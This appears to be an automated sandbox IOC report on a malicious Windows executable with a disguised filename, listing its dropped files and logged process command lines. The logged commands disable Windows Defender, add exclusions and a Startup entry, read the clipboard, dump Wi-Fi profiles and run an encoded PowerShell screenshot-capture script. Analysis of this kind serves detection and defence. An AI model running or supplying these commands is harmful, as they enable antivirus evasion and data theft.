IOC Report
#U202f#U202f#U2005#U00a0.scr.exe

loading gif

Files

File Path
Type
Category
Malicious
#U202f#U202f#U2005#U00a0.scr.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\QzNtG.zip
RAR archive data, v5
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key
ASCII text
dropped
malicious
C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\??? \Display (1).png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\MpCmdRun.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\RES6756.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Aug 4 02:13:43 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-filesystem-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-heap-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-locale-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-math-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-process-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-runtime-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-stdio-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-string-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-time-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-utility-l1-1-0.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\libcrypto-3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\libffi-8.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\libssl-3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ric4va3.zfn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kckqprz.iaa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sbbme0r.vlf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x1or3kc.dz1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ycgcdox.5ji.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kwun0or.kqx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arfxlphr.jtx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cehndozn.1kt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evf4zszv.cxz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsj2c4gj.xvf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gaxjbgjc.1d5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3vnjgc0.mf2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpvl03jk.qtf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofim2axs.cug.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbntxrea.jqh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1whz1zs.vmd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rclviame.ank.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpg5r4x5.ztf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_taz2xs5r.f43.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucbjvdr1.jdn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umcknxo3.uph.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ur3qxbib.jfl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xen0z0ng.030.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzrfgrgf.hm5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.0.cs
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.out
Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
modified
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 86 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
"C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
malicious
C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
"C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profile
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
malicious
C:\Windows\System32\systeminfo.exe
systeminfo
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBl